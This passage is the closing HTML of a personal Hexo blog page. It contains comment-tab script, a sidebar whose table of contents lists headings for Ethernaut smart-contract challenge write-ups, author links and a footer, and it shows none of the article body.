      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AD%A6%E4%B9%A0%E4%B9%8B%E5%A3%B9"><span class="nav-number">1.</span> <span class="nav-text">区块链学习之壹</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ethernaut-Coin-Flip"><span class="nav-number">1.1.</span> <span class="nav-text">ethernaut - Coin Flip</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3"><span class="nav-number">1.1.1.</span> <span class="nav-text">题解</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-Remix-Injected-Provider-%E7%BC%96%E5%86%99-attacking-contract"><span class="nav-number">1.1.2.</span> <span class="nav-text">使用 Remix - Injected Provider 编写 attacking contract</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ethernaut-Telephone"><span class="nav-number">1.2.</span> <span class="nav-text">ethernaut - Telephone</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#difference-between-msg-sender-tx-origin"><span class="nav-number">1.2.1.</span> <span class="nav-text">difference between msg.sender&amp;tx.origin</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3-1"><span class="nav-number">1.2.2.</span> <span class="nav-text">题解</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ethernaut-Telephone-1"><span class="nav-number">1.3.</span> <span class="nav-text">ethernaut - Telephone</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#What-is-an-odometer"><span class="nav-number">1.3.1.</span> <span class="nav-text">What is an odometer?</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#uint-overflow"><span class="nav-number">1.3.2.</span> <span class="nav-text">uint overflow</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3-2"><span class="nav-number">1.3.3.</span> <span class="nav-text">题解</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ethernaut-Delegation"><span class="nav-number">1.4.</span> <span class="nav-text">ethernaut - Delegation</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3-3"><span class="nav-number">1.4.1.</span> <span class="nav-text">题解</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ethernaut-Force"><span class="nav-number">1.5.</span> <span class="nav-text">ethernaut - Force</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3-4"><span class="nav-number">1.5.1.</span> <span class="nav-text">题解</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BD%A0%E5%A5%BD"><span class="nav-number">1.6.</span> <span class="nav-text">你好</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">QST137</p>
  <div class="site-description" itemprop="description">三山岁岁有人去，唯恐海风生白波。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Qst137" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Qst137" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:Q_ST@bupt.edu.cn" title="E-Mail → mailto:Q_ST@bupt.edu.cn" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">QST137</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
